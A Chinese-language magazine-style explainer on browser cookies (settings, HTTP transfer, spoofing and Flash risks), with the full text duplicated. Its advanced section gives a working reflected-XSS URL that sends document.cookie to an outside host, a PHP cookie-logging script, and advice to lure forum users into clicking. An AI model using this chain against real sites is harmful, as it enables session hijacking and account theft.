編者按:Cookie在英文中是小甜品的意思,而這個詞我們總能在瀏覽器中看到,食品怎么會跟瀏覽器扯上關系呢?在你瀏覽以前登陸過的網站時可能會在網頁中出現:你好XX,感覺很親切,就好像是吃了一個小甜品一樣。這其實是通過訪問你主機里邊的一個文件來實現的,因此這個文件也就被稱為了Cookie。想全面了解Cookie嗎?看看下文吧!
一.了解Cookie 適用對象:初級讀者
Cookie是當你瀏覽某網站時,網站存儲在你機器上的一個小文本文件,它記錄了你的用戶ID,密碼、瀏覽過的網頁、停留的時間等信息,當你再次來到該網站時,網站通過讀取Cookie,得知你的相關信息,就可以做出相應的動作,如在頁面顯示歡迎你的標語,或者讓你不用輸入ID、密碼就直接登錄等等。你可以在IE的“工具/Internet選項”的“常規”選項卡中,選擇“設置/查看文件”,查看所有保存到你電腦里的Cookie。這些文件通常是以user@domain格式命名的,user是你的本地用戶名,domain是所訪問的網站的域名。如果你使用NetsCape瀏覽器,則存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面,與IE不同的是,NETSCAPE是使用一個Cookie 文件記錄所有網站的Cookies。
為了保證上網安全我們需要對Cookie進行適當設置。打開“工具/Internet選項”中的“隱私”選項卡(注意該設置只在IE6.0中存在,其他版本IE可以在“工具/Internet選項”的“安全”標簽中單擊“自定義級別”按鈕,進行簡單調整),調整Cookie的安全級別。通常情況,可以將滑塊調整到“中高”或者“高”的位置。多數的論壇站點需要使用Cookie信息,如果你從來不去這些地方,可以將安全級調到“阻止所有Cookies”。如果只是為了禁止個別網站的Cookie,可以單擊“編輯”按鈕,將要屏蔽的網站添加到列表中。在“高級”按鈕選項中,你可以對第一方Cookie和第三方的Cookie進行設置,第一方Cookie是你正在瀏覽的網站的Cookie,第三方Cookie非正在瀏覽的網站發給你的Cookie,通常要對第三方Cookie選擇“拒絕”,如圖1。你如果需要保存Cookie,可以使用IE的“導入導出”功能,打開“文件/導入導出”,按提示操作即可。
Cookie中的內容大多數經過了加密處理,因此在我們看來只是一些毫無意義的字母數字組合,只有服務器的CGI處理程序才知道它們真正的含義。通過一些軟件我們可以查看到更多的內容,使用Cookie Pal軟件查看到的Cookie信息,如圖2所示。它為我們提供了Server、Expires、Name、Value等選項的內容。其中,Server是存儲Cookie的網站,Expires記錄了Cookie的時間和生命期,Name和value字段則是具體的數據(本報第10期第42版對該軟件有詳細介紹)。
下載地址:http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe。
二、Cookie的傳遞流程 適用對象:中級讀者
當在瀏覽器地址欄中鍵入了一個Web站點的URL,瀏覽器會向該Web站點發送一個讀取網頁的請求,并將結果在顯示器上顯示。這時該網頁在你的電腦上尋找Amazon網站設置的Cookie文件,如果找到,瀏覽器會把Cookie文件中的數據連同前面輸入的URL一同發送到Amazon服務器。服務器收到Cookie數據,就會在他的數據庫中檢索你的ID,你的購物記錄、個人喜好等信息,并記錄下新的內容,增加到數據庫和Cookie文件中去。如果沒有檢測到Cookie或者你的Cookie信息與數據庫中的信息不符合,則說明你是第一次瀏覽該網站,服務器的CGI程序將為你創建新的ID信息,并保存到數據庫中。
Cookie是利用了網頁代碼中的HTTP頭信息進行傳遞的,瀏覽器的每一次網頁請求,都可以伴隨Cookie傳遞,例如,瀏覽器的打開或刷新網頁操作。服務器將Cookie添加到網頁的HTTP頭信息中,伴隨網頁數據傳回到你的瀏覽器,瀏覽器會根據你電腦中的Cookie設置選擇是否保存這些數據。如果瀏覽器不允許Cookie保存,則關掉瀏覽器后,這些數據就消失。Cookie在電腦上保存的時間是不一樣的,這些都是由服務器的設置不同決定得。Cookie有一個Expires(有效期)屬性,這個屬性決定了Cookie的保存時間,服務器可以通過設定Expires字段的數值,來改變Cookie的保存時間。如果不設置該屬性,那么Cookie只在瀏覽網頁期間有效,關閉瀏覽器,這些Cookie自動消失,絕大多數網站屬于這種情況。通常情況下,Cookie包含Server、Expires、Name、Value這幾個字段,其中對服務器有用的只是Name和Value字段,Expires等字段的內容僅僅是為了告訴瀏覽器如何處理這些Cookies。
三、Cookie的編程實現 適用對象:高級讀者
多數網頁編程語言都提供了對Cookie的支持。如JavaScript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些面向對象的編程語言中,對Cookie的編程利用基本上是相似的,大體過程為:先創建一個Cookie對象(Object),然后利用控制函數對Cookie進行賦值、讀取、寫入等操作。那么如何通過代碼來獲取其他用戶Cookie中的敏感信息?下面進行簡單的介紹。
該方法主要有兩步,首先要定位你需要收集Cookie的網站,并對其進行分析,并構造URL;然后編制收集Cookie的PHP代碼,并將其放到你可以控制的網站上,當不知情者單擊了你構造的URL后可以執行該PHP代碼。下面我們看具體的實現過程。
1.分析并構造URL
首先打開我們要收集Cookie的網站,這里假設是http://www.XXX.net,登陸網站輸入用戶名“<A1>”(不含引號),對數據進行分析抓包,得到形如“http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x=28&ok.y=6”的代碼,將“<A1>”更換為“<script>alert(document.cookie)</script>”再試;如果執行成功,就開始構造URL:“http://www.XXX.net/txl/login/login.pl?username=<script>window.open("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能夠控制的某臺主機上的一個腳本。需要注意的是“%2B”為符號“+”的URL編碼,因為“+”將被作為空格處理。該URL就可以在論壇中發布,誘使別人點擊了。
2.編制PHP腳本
該腳本的作用就是收集Cookie文件,具體內容如下:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: http://www.XXX.net");
?>
四、Cookie的安全問題 適用對象:所有希望上網安全的讀者
1.Cookie欺騙
Cookie記錄著用戶的帳戶ID、密碼之類的信息,如果在網上傳遞,通常使用的是MD5方法加密。這樣經過加密處理后的信息,即使被網絡上一些別有用心的人截獲,也看不懂,因為他看到的只是一些無意義的字母和數字。然而,現在遇到的問題是,截獲Cookie的人不需要知道這些字符串的含義,他們只要把別人的Cookie向服務器提交,并且能夠通過驗證,他們就可以冒充受害人的身份,登陸網站。這種方法叫做Cookie欺騙。Cookie欺騙實現的前提條件是服務器的驗證程序存在漏洞,并且冒充者要獲得被冒充的人的Cookie信息。目前網站的驗證程序要排除所有非法登錄是非常困難的,例如,編寫驗證程序使用的語言可能存在漏洞。而且要獲得別人Cookie是很容易的,用支持Cookie的語言編寫一小段代碼就可以實現(具體方法見三),只要把這段代碼放到網絡里,那么所有人的Cookie都能夠被收集。如果一個論壇允許HTML代碼或者允許使用Flash標簽就可以利用這些技術收集Cookie的代碼放到論壇里,然后給帖子取一個吸引人的主題,寫上有趣的內容,很快就可以收集到大量的Cookie。在論壇上,有許多人的密碼就被這種方法盜去的。至于如何防范,目前還沒有特效藥,我們也只能使用通常的防護方法,不要在論壇里使用重要的密碼,也不要使用IE自動保存密碼的功能,以及盡量不登陸不了解底細的網站。
2.Flash的代碼隱患
Flash中有一個getURL()函數,Flash可以利用這個函數自動打開指定的網頁。因此它可能把你引向一個包含惡意代碼的網站。打個比方,當你在自己電腦上欣賞精美的Flash動畫時,動畫幀里的代碼可能已經悄悄地連上網,并打開了一個極小的包含有特殊代碼的頁面。這個頁面可以收集你的Cookie、也可以做一些其他的事情,比如在你的機器上種植木馬甚至格式化你的硬盤等等。對于Flash的這種行為,網站是無法禁止的,因為這是Flash文件的內部行為。我們所能做到的,如果是在本地瀏覽盡量打開防火墻,如果防火墻提示的向外發送的數據包并不為你知悉,最好禁止。如果是在Internet上欣賞,最好找一些知名的大網站。
一.了解Cookie 適用對象:初級讀者
Cookie是當你瀏覽某網站時,網站存儲在你機器上的一個小文本文件,它記錄了你的用戶ID,密碼、瀏覽過的網頁、停留的時間等信息,當你再次來到該網站時,網站通過讀取Cookie,得知你的相關信息,就可以做出相應的動作,如在頁面顯示歡迎你的標語,或者讓你不用輸入ID、密碼就直接登錄等等。你可以在IE的“工具/Internet選項”的“常規”選項卡中,選擇“設置/查看文件”,查看所有保存到你電腦里的Cookie。這些文件通常是以user@domain格式命名的,user是你的本地用戶名,domain是所訪問的網站的域名。如果你使用NetsCape瀏覽器,則存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面,與IE不同的是,NETSCAPE是使用一個Cookie 文件記錄所有網站的Cookies。
為了保證上網安全我們需要對Cookie進行適當設置。打開“工具/Internet選項”中的“隱私”選項卡(注意該設置只在IE6.0中存在,其他版本IE可以在“工具/Internet選項”的“安全”標簽中單擊“自定義級別”按鈕,進行簡單調整),調整Cookie的安全級別。通常情況,可以將滑塊調整到“中高”或者“高”的位置。多數的論壇站點需要使用Cookie信息,如果你從來不去這些地方,可以將安全級調到“阻止所有Cookies”。如果只是為了禁止個別網站的Cookie,可以單擊“編輯”按鈕,將要屏蔽的網站添加到列表中。在“高級”按鈕選項中,你可以對第一方Cookie和第三方的Cookie進行設置,第一方Cookie是你正在瀏覽的網站的Cookie,第三方Cookie非正在瀏覽的網站發給你的Cookie,通常要對第三方Cookie選擇“拒絕”,如圖1。你如果需要保存Cookie,可以使用IE的“導入導出”功能,打開“文件/導入導出”,按提示操作即可。
Cookie中的內容大多數經過了加密處理,因此在我們看來只是一些毫無意義的字母數字組合,只有服務器的CGI處理程序才知道它們真正的含義。通過一些軟件我們可以查看到更多的內容,使用Cookie Pal軟件查看到的Cookie信息,如圖2所示。它為我們提供了Server、Expires、Name、Value等選項的內容。其中,Server是存儲Cookie的網站,Expires記錄了Cookie的時間和生命期,Name和value字段則是具體的數據(本報第10期第42版對該軟件有詳細介紹)。
下載地址:http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe。
二、Cookie的傳遞流程 適用對象:中級讀者
當在瀏覽器地址欄中鍵入了一個Web站點的URL,瀏覽器會向該Web站點發送一個讀取網頁的請求,并將結果在顯示器上顯示。這時該網頁在你的電腦上尋找Amazon網站設置的Cookie文件,如果找到,瀏覽器會把Cookie文件中的數據連同前面輸入的URL一同發送到Amazon服務器。服務器收到Cookie數據,就會在他的數據庫中檢索你的ID,你的購物記錄、個人喜好等信息,并記錄下新的內容,增加到數據庫和Cookie文件中去。如果沒有檢測到Cookie或者你的Cookie信息與數據庫中的信息不符合,則說明你是第一次瀏覽該網站,服務器的CGI程序將為你創建新的ID信息,并保存到數據庫中。
Cookie是利用了網頁代碼中的HTTP頭信息進行傳遞的,瀏覽器的每一次網頁請求,都可以伴隨Cookie傳遞,例如,瀏覽器的打開或刷新網頁操作。服務器將Cookie添加到網頁的HTTP頭信息中,伴隨網頁數據傳回到你的瀏覽器,瀏覽器會根據你電腦中的Cookie設置選擇是否保存這些數據。如果瀏覽器不允許Cookie保存,則關掉瀏覽器后,這些數據就消失。Cookie在電腦上保存的時間是不一樣的,這些都是由服務器的設置不同決定得。Cookie有一個Expires(有效期)屬性,這個屬性決定了Cookie的保存時間,服務器可以通過設定Expires字段的數值,來改變Cookie的保存時間。如果不設置該屬性,那么Cookie只在瀏覽網頁期間有效,關閉瀏覽器,這些Cookie自動消失,絕大多數網站屬于這種情況。通常情況下,Cookie包含Server、Expires、Name、Value這幾個字段,其中對服務器有用的只是Name和Value字段,Expires等字段的內容僅僅是為了告訴瀏覽器如何處理這些Cookies。
三、Cookie的編程實現 適用對象:高級讀者
多數網頁編程語言都提供了對Cookie的支持。如JavaScript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些面向對象的編程語言中,對Cookie的編程利用基本上是相似的,大體過程為:先創建一個Cookie對象(Object),然后利用控制函數對Cookie進行賦值、讀取、寫入等操作。那么如何通過代碼來獲取其他用戶Cookie中的敏感信息?下面進行簡單的介紹。
該方法主要有兩步,首先要定位你需要收集Cookie的網站,并對其進行分析,并構造URL;然后編制收集Cookie的PHP代碼,并將其放到你可以控制的網站上,當不知情者單擊了你構造的URL后可以執行該PHP代碼。下面我們看具體的實現過程。
1.分析并構造URL
首先打開我們要收集Cookie的網站,這里假設是http://www.XXX.net,登陸網站輸入用戶名“<A1>”(不含引號),對數據進行分析抓包,得到形如“http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x=28&ok.y=6”的代碼,將“<A1>”更換為“<script>alert(document.cookie)</script>”再試;如果執行成功,就開始構造URL:“http://www.XXX.net/txl/login/login.pl?username=<script>window.open("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能夠控制的某臺主機上的一個腳本。需要注意的是“%2B”為符號“+”的URL編碼,因為“+”將被作為空格處理。該URL就可以在論壇中發布,誘使別人點擊了。
2.編制PHP腳本
該腳本的作用就是收集Cookie文件,具體內容如下:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: http://www.XXX.net");
?>
四、Cookie的安全問題 適用對象:所有希望上網安全的讀者
1.Cookie欺騙
Cookie記錄著用戶的帳戶ID、密碼之類的信息,如果在網上傳遞,通常使用的是MD5方法加密。這樣經過加密處理后的信息,即使被網絡上一些別有用心的人截獲,也看不懂,因為他看到的只是一些無意義的字母和數字。然而,現在遇到的問題是,截獲Cookie的人不需要知道這些字符串的含義,他們只要把別人的Cookie向服務器提交,并且能夠通過驗證,他們就可以冒充受害人的身份,登陸網站。這種方法叫做Cookie欺騙。Cookie欺騙實現的前提條件是服務器的驗證程序存在漏洞,并且冒充者要獲得被冒充的人的Cookie信息。目前網站的驗證程序要排除所有非法登錄是非常困難的,例如,編寫驗證程序使用的語言可能存在漏洞。而且要獲得別人Cookie是很容易的,用支持Cookie的語言編寫一小段代碼就可以實現(具體方法見三),只要把這段代碼放到網絡里,那么所有人的Cookie都能夠被收集。如果一個論壇允許HTML代碼或者允許使用Flash標簽就可以利用這些技術收集Cookie的代碼放到論壇里,然后給帖子取一個吸引人的主題,寫上有趣的內容,很快就可以收集到大量的Cookie。在論壇上,有許多人的密碼就被這種方法盜去的。至于如何防范,目前還沒有特效藥,我們也只能使用通常的防護方法,不要在論壇里使用重要的密碼,也不要使用IE自動保存密碼的功能,以及盡量不登陸不了解底細的網站。
2.Flash的代碼隱患
Flash中有一個getURL()函數,Flash可以利用這個函數自動打開指定的網頁。因此它可能把你引向一個包含惡意代碼的網站。打個比方,當你在自己電腦上欣賞精美的Flash動畫時,動畫幀里的代碼可能已經悄悄地連上網,并打開了一個極小的包含有特殊代碼的頁面。這個頁面可以收集你的Cookie、也可以做一些其他的事情,比如在你的機器上種植木馬甚至格式化你的硬盤等等。對于Flash的這種行為,網站是無法禁止的,因為這是Flash文件的內部行為。我們所能做到的,如果是在本地瀏覽盡量打開防火墻,如果防火墻提示的向外發送的數據包并不為你知悉,最好禁止。如果是在Internet上欣賞,最好找一些知名的大網站。